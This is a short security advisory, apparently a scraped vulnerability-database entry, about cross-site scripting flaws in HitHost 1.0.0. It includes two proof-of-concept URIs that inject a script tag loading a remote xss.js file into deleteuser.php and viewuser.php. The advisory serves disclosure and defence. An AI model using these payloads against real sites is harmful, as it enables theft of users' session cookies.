[原文]Cross-site scripting (XSS) vulnerability in HitHost 1.0.0 allows remote attackers to inject arbitrary web script or HTML via (1) the user parameter in deleteuser.php and (2) the hits parameter in viewuser.php.
retard is credited with the discovery of these vulnerabilities.
Daverave HitHost 1.0
HitHost is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
This issue can be exploited through a web client.
The following proof-of-concept URIs are available: http://www.example.com/admin/deleteuser.php?user=<script%20src=http://www.example.com/xss.js></script> http://www.example.com/admin/viewuser.php?hits=<script%20src=http://www.exmaple.com/xss.js></script>
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: mailto:firstname.lastname@example.org.